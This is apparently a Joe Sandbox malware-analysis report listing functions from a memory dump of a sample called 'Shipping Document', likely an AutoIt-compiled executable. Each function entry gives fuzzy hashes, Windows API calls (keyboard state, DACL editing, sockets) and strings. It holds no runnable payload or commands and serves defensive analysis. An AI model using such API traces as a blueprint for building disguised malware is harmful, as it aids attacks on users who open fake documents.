Opcode Fuzzy Hash: f698f4c8425d69a178e1001cf494dd09d1adeb2479c2e03a885bf7eb5f4b0311
Instruction Fuzzy Hash: 4681D171504255DFDB60EFA8C8959AEB7E8BB88310F18886EF9C9C7211E634ED44CB52

Function 0104C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0104C4EC
GetFocus.USER32 ref: 0104C4FC
GetDlgCtrlID.USER32(00000000), ref: 0104C507
_memset.LIBCMT ref: 0104C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0104C65D
GetMenuItemCount.USER32(?), ref: 0104C67D
GetMenuItemID.USER32(?,00000000), ref: 0104C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0104C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0104C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0104C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0104C779

Strings

0, xrefs: 0104C62A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 5f70a2ed2bd6265cf41d09bd88d564fe8aeb8a35e6a30d95112b558ff570245a
Instruction ID: 935b489cf732cc905725ce976b578e20fe037bf8e10c7056debe5cdca7ecdde2
Opcode Fuzzy Hash: 5f70a2ed2bd6265cf41d09bd88d564fe8aeb8a35e6a30d95112b558ff570245a
Instruction Fuzzy Hash: 68818FB01093019FE761DF18CAC4A6BBBE8FB88314F00456DF9D593251D731E905CBA2

Function 010183F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0101874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01018766
Part of subcall function 0101874A: GetLastError.KERNEL32(?,0101822A,?,?,?), ref: 01018770
Part of subcall function 0101874A: GetProcessHeap.KERNEL32(00000008,?,?,0101822A,?,?,?), ref: 0101877F
Part of subcall function 0101874A: HeapAlloc.KERNEL32(00000000,?,0101822A,?,?,?), ref: 01018786
Part of subcall function 0101874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101879D

Part of subcall function 010187E7: GetProcessHeap.KERNEL32(00000008,01018240,00000000,00000000,?,01018240,?), ref: 010187F3
Part of subcall function 010187E7: HeapAlloc.KERNEL32(00000000,?,01018240,?), ref: 010187FA
Part of subcall function 010187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01018240,?), ref: 0101880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01018458
_memset.LIBCMT ref: 0101846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0101848C
GetLengthSid.ADVAPI32(?), ref: 0101849D
GetAce.ADVAPI32(?,00000000,?), ref: 010184DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010184F6
GetLengthSid.ADVAPI32(?), ref: 01018513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01018522
HeapAlloc.KERNEL32(00000000), ref: 01018529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0101854A
CopySid.ADVAPI32(00000000), ref: 01018551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01018582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 010185A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 010185BC

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: b2f6e3508c03a77d3cca0204a58a4c30524f51b02ac28ff11c54aab36fa9c959
Instruction ID: 2c7064d297ee35d75116c86521a13552edc59dcdacbab66726ab3174468bd597
Opcode Fuzzy Hash: b2f6e3508c03a77d3cca0204a58a4c30524f51b02ac28ff11c54aab36fa9c959
Instruction Fuzzy Hash: D3615E7590020AAFDF10DF98DD84AEEBBB9FF44310F04815AF955A7284DB399A15CF60

Function 0103762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 010376A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 010376AE
CreateCompatibleDC.GDI32(?), ref: 010376BA
SelectObject.GDI32(00000000,?), ref: 010376C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0103771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01037757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0103777B
SelectObject.GDI32(00000006,?), ref: 01037783
DeleteObject.GDI32(?), ref: 0103778C
DeleteDC.GDI32(00000006), ref: 01037793
ReleaseDC.USER32(00000000,?), ref: 0103779E

Strings

(, xrefs: 01037723

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 360143d4c08cc778a9c5b562fdb05276950122c973d6d2a48b0bcc768ed47453
Instruction ID: d60a38849504d3118e6f4c6a3b5574a47726b163e3673341c937bc56070afd35
Opcode Fuzzy Hash: 360143d4c08cc778a9c5b562fdb05276950122c973d6d2a48b0bcc768ed47453
Instruction Fuzzy Hash: 7A514CB5900209EFDB25CFA8C984EAEBBF9FF88710F14851DF99997210D735A840CB60

Function 0102A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,0104FB78), ref: 0102A0FC

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 0102A11E
__swprintf.LIBCMT ref: 0102A177
__swprintf.LIBCMT ref: 0102A190
_wprintf.LIBCMT ref: 0102A246
_wprintf.LIBCMT ref: 0102A264

Strings

Line %d (File "%s"):, xrefs: 0102A171, 0102A18A
^ ERROR, xrefs: 0102A1E8
"%s" (%d) : ==> %s:, xrefs: 0102A25F
Error: , xrefs: 0102A20E
"%s" (%d) : ==> %s:%s%s, xrefs: 0102A241

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: d73e770a65933691dd0ac08a64f051d1a8de13e031fd83195e160b9b41c3db8e
Instruction ID: afde35f4e4c6d853ac188b1ba9d3d66ffe1917dc06c6359124960b5d41f25884
Opcode Fuzzy Hash: d73e770a65933691dd0ac08a64f051d1a8de13e031fd83195e160b9b41c3db8e
Instruction Fuzzy Hash: E6516F7290421AAADF15FBE4CE86EEEB779AF04300F1001A9F54567051DB3A6F48EF60

Function 00FC6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00FE0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FC6C6C,?,00008000), ref: 00FE0BB7

Part of subcall function 00FC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FC48A1,?,?,00FC37C0,?), ref: 00FC48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FC6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00FC6E5A

Part of subcall function 00FC59CD: _wcscpy.LIBCMT ref: 00FC5A05

Part of subcall function 00FE387D: _iswctype.LIBCMT ref: 00FE3885

Strings

Unterminated string, xrefs: 00FFEC0D
EA06, xrefs: 00FFE87B
Bad directive syntax error, xrefs: 00FFEBC6
AU3!, xrefs: 00FC6CC1
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00FFE84A
Error opening the file, xrefs: 00FFE866, 00FFE8E1
>>>AUTOIT SCRIPT<<<, xrefs: 00FFE8BF

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: cf5eb62e019fe3c71687f94638bd408282c36129a3f6e36be678a6bd4da92ba8
Instruction ID: 6e1ece3c943f28b6cf53d242f5158281c296860b38ecdc45df93c82c972a3755
Opcode Fuzzy Hash: cf5eb62e019fe3c71687f94638bd408282c36129a3f6e36be678a6bd4da92ba8
Instruction Fuzzy Hash: 7F0289315083429FC724EF24C982EAFBBE5AF98754F04091DF5C6972A1DB34E949EB42

Function 00FC45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FC45F9
GetMenuItemCount.USER32(01086890), ref: 00FFD7CD
GetMenuItemCount.USER32(01086890), ref: 00FFD87D
GetCursorPos.USER32(?), ref: 00FFD8C1
SetForegroundWindow.USER32(00000000), ref: 00FFD8CA
TrackPopupMenuEx.USER32(01086890,00000000,?,00000000,00000000,00000000), ref: 00FFD8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FFD8E9

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: a1f7073be8a628b4d687ae60fb8e6a181542e6c64f368f73de1e8ba4f4e03150
Instruction ID: 4b7b10187384f3e656c11ef5053f6c669536fa1c44fc0a11f66a106dabd541d9
Opcode Fuzzy Hash: a1f7073be8a628b4d687ae60fb8e6a181542e6c64f368f73de1e8ba4f4e03150
Instruction Fuzzy Hash: 1F710972A4121ABBEB309F54DD89FBABF65FF05374F200216F6156A1E0C7B56810EB90

Function 010410A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,01040038,?,?), ref: 010410BC

Strings

HKEY_USERS, xrefs: 010411BD
HKU, xrefs: 010411CE
HKCR, xrefs: 01041164
HKEY_CURRENT_CONFIG, xrefs: 01041179
HKEY_CURRENT_USER, xrefs: 0104119B
HKLM, xrefs: 0104113A
HKCU, xrefs: 010411AC
HKEY_CLASSES_ROOT, xrefs: 0104114F
HKEY_LOCAL_MACHINE, xrefs: 01041125
HKCC, xrefs: 0104118A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 1ffae9be09d4efba0875aef29fe363c1f2783ee63a458c176b9ec032f13ee201
Instruction ID: 72bf68602e79e9a6c75d958706e7d7191a2cdcde38d3c532f58aa9a268f4531c
Opcode Fuzzy Hash: 1ffae9be09d4efba0875aef29fe363c1f2783ee63a458c176b9ec032f13ee201
Instruction Fuzzy Hash: 93414BB055028B9BCF21EF94DE81AEE3764BF45310F404464FCD19B292DF75A99ACBA0

Function 01025569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

Part of subcall function 00FC7A84: _memmove.LIBCMT ref: 00FC7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 010255D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 010255E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 010255F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0102560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0102561C

Strings

close PlayMe, xrefs: 010255E3, 01025610
alias PlayMe, xrefs: 010255AB
play PlayMe wait, xrefs: 01025606
status PlayMe mode, xrefs: 010255CD
open , xrefs: 01025581
play PlayMe, xrefs: 01025617

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 076626d24b51d7ae3fc6099ad9c9712c75af5cde4a78c9333833585a3e572e6c
Instruction ID: 55b072a02d98347341838f9420fa97aa93b28ba64655021a5e456c685e889e1f
Opcode Fuzzy Hash: 076626d24b51d7ae3fc6099ad9c9712c75af5cde4a78c9333833585a3e572e6c
Instruction Fuzzy Hash: A311E620A5026AB9E720BA66DC8ADFFBF7CEF85B00F04445DB485A7091DEA41D04C9A4

Function 010248F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0102490E
gethostname.WSOCK32(?,00000100), ref: 01024928
gethostbyname.WSOCK32(?), ref: 01024935
_wcscpy.LIBCMT ref: 0102495D
_memmove.LIBCMT ref: 01024970
inet_ntoa.WSOCK32(?), ref: 0102497B
_strcat.LIBCMT ref: 01024989
_wcscpy.LIBCMT ref: 010249A0
WSACleanup.WSOCK32 ref: 010249AE
_wcscpy.LIBCMT ref: 010249BC

Strings

0.0.0.0, xrefs: 01024957

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 8b2911af4932a9fac60058b6f3c6f0f97af18d3c17ff9581cf6446dd31a47ef7
Instruction ID: 6847a996192befbdb983c3f212e0ff5e8481720a203ba18888abe58bd2b4efd2
Opcode Fuzzy Hash: 8b2911af4932a9fac60058b6f3c6f0f97af18d3c17ff9581cf6446dd31a47ef7
Instruction Fuzzy Hash: D8112775A04125ABEB20EB29ED49EDE77FCEF00710F0401BAF584D6041EFB99A819751

Function 01025217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0102521C

Part of subcall function 00FE0719: timeGetTime.WINMM(?,75A4B400,00FD0FF9), ref: 00FE071D

Sleep.KERNEL32(0000000A), ref: 01025248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0102526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0102528E
SetActiveWindow.USER32 ref: 010252AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 010252BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 010252DA
Sleep.KERNEL32(000000FA), ref: 010252E5
IsWindow.USER32 ref: 010252F1
EndDialog.USER32(00000000), ref: 01025302

Strings

BUTTON, xrefs: 01025280

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: c3ace3f4bae6ea409589f3ae5b8a200f922b674804c422eaf7f5db77af8732e3
Instruction ID: 0fafb17964c58a76fadb44a109ed7244ff2bdab15a6413b897ce9df2e65a7ca2
Opcode Fuzzy Hash: c3ace3f4bae6ea409589f3ae5b8a200f922b674804c422eaf7f5db77af8732e3
Instruction Fuzzy Hash: EC21F6B4204346EFE7205B38EEC8B6E3BA9EB0A356F501058F1C1851D8DBAF9C048775

Function 0102D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

CoInitialize.OLE32(00000000), ref: 0102D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0102D8E8
SHGetDesktopFolder.SHELL32(?), ref: 0102D8FC
CoCreateInstance.OLE32(01052D7C,00000000,00000001,0107A89C,?), ref: 0102D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0102D9B7
CoTaskMemFree.OLE32(?,?), ref: 0102DA0F
_memset.LIBCMT ref: 0102DA4C
SHBrowseForFolderW.SHELL32(?), ref: 0102DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0102DAAB
CoTaskMemFree.OLE32(00000000), ref: 0102DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0102DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 0102DAEB

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: cc4643ccf340607774e42d7e84db2d2df67ed38fa461bb87724687590bb04479
Instruction ID: 08b293327973a913f87daf22a6534c3f09da8d61233384baf4bafd90870b2b03
Opcode Fuzzy Hash: cc4643ccf340607774e42d7e84db2d2df67ed38fa461bb87724687590bb04479
Instruction Fuzzy Hash: ACB14E75A00119AFDB04DFA8C989EAEBBF9FF88300B048499F949DB251DB75ED41CB50

Function 0102052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 010205A7
SetKeyboardState.USER32(?), ref: 01020612
GetAsyncKeyState.USER32(000000A0), ref: 01020632
GetKeyState.USER32(000000A0), ref: 01020649
GetAsyncKeyState.USER32(000000A1), ref: 01020678
GetKeyState.USER32(000000A1), ref: 01020689
GetAsyncKeyState.USER32(00000011), ref: 010206B5
GetKeyState.USER32(00000011), ref: 010206C3
GetAsyncKeyState.USER32(00000012), ref: 010206EC
GetKeyState.USER32(00000012), ref: 010206FA
GetAsyncKeyState.USER32(0000005B), ref: 01020723
GetKeyState.USER32(0000005B), ref: 01020731

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: df8bc09ef03b926bc6bebdb71d288c965bc24dab9f6e7acb408edab1e2252b91
Instruction ID: 66a21cb796df45eb8ef590b6ec8212aef2453db4e1fbf7c00121cc14761ad38f
Opcode Fuzzy Hash: df8bc09ef03b926bc6bebdb71d288c965bc24dab9f6e7acb408edab1e2252b91
Instruction Fuzzy Hash: 5A512C70A047B819FB75DBB488547EBBFF49F01280F0845C9DAC2561C6DA74978CCB61

Function 0101C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0101C746
GetWindowRect.USER32(00000000,?), ref: 0101C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0101C7B6
GetDlgItem.USER32(?,00000002), ref: 0101C7C1
GetWindowRect.USER32(00000000,?), ref: 0101C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0101C827
GetDlgItem.USER32(?,000003E9), ref: 0101C835
GetWindowRect.USER32(00000000,?), ref: 0101C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0101C889
GetDlgItem.USER32(?,000003EA), ref: 0101C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0101C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0101C8C1

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 0bd9cdf719ab75e41f7120c33cf44fc356ec72beb7f85186aa5df910b0b88485
Instruction ID: 2de1ac9efd6ceed0b39bc83aaefdd35b4c3faddc74fe05914ec970cef2eb9394
Opcode Fuzzy Hash: 0bd9cdf719ab75e41f7120c33cf44fc356ec72beb7f85186aa5df910b0b88485
Instruction Fuzzy Hash: A85153B5B00205AFEB18CF7CDE89AAEBBB5FB88310F14816DF555D6294D775D9008B10

Function 00FC201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FC2036,?,00000000,?,?,?,?,00FC16CB,00000000,?), ref: 00FC1B9A

